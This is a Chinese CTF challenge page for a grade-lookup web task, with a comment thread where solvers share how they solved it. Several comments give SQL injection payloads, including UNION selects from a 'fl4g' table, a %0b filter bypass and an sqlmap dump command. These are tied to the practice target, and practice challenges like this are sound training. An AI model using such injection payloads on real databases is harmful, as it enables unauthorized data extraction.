成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 8189
提  示:
描  述:
来源山科大ctf
评论
xiaoxhw 1年前

利用”不显示“代表”报错“

回复 2

笨笨笨蛋 1年前

我sqlmap进入fl4g后查看内容压根没有flag,可是手工注入又有了,这是为什么?求一个大佬解释一下

回复 0
aWxvdmVjdGY 1年前

fl4g 是db,然后找table,在找cloumns,最后dump

回复 0

教练我要打亚索 1年前

先猜一下字段,我也是没猜字段直接取数据 没取到,需要先取一下字段 然后再来取数据

回复 0

笨笨笨蛋 1年前

有大佬用sqlmap做的吗?我想看看sqlmap怎么做这个题目

回复 0
摆烂选手 1年前

@charonzzw 阿巴阿巴,摆烂选手大眼瞪小眼,咋搞啊。有没有会的,哭了

回复 0

theonlypopcat 1年前

sqlmap --url="http://靶场地址/index.php" --data="id=1" -D skctf -T fl4g -C skctf_flag --dump

回复 0

charonzzw 1年前

用burp去抓包 然后copy to flie 形成txt文件,sqlmap去运行这个包 然后依次查库 表 列就出flag了

回复 1

秋刀鱼の丸 1年前

1' and 1=2 union select 1,2,3,skctf_flag from fl4g#

回复 1

jiangyou 1年前

http://t.csdn.cn/GCIkY

回复 1

Hobin 1年前

一个sqlmap就能完美解决

回复 0

MONSTEinCAT 1年前

鸡你太美

回复 1
阿厂 1年前

哎呦你干嘛

回复 0

肥肠粉 1年前

小黑子,哥哥下的蛋你别吃

回复 0

Sauexceed 1年前

小黑子

回复 0

yemur 1年前

id=-1' union select 1,2,3,skctf_flag from fl4g#

回复 0

lysandria 1年前

过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#

回复 0

15338641414 1年前

输入框的sql注入

回复 0

WriteUp

image
harry

2 金币

评分(19)

解题动态

13170223655 攻破了该题 8小时前
nlHaha 攻破了该题 1天前
liuyuchen 攻破了该题 1天前
ey0272 攻破了该题 1天前
codehub 攻破了该题 2天前
18993762527 攻破了该题 2天前
coolsword2023 攻破了该题 4天前
群众里有坏人 攻破了该题 4天前
ey027 攻破了该题 7天前
1802392956 攻破了该题 7天前
donbrothers 攻破了该题 7天前
小噗 攻破了该题 7天前
LUCKY721 攻破了该题 7天前
yijueo 攻破了该题 8天前
wwt111 攻破了该题 8天前
lotuswhite 攻破了该题 8天前
lizhi123456 攻破了该题 9天前
111lll 攻破了该题 9天前
441062352 攻破了该题 10天前
17745788393 攻破了该题 10天前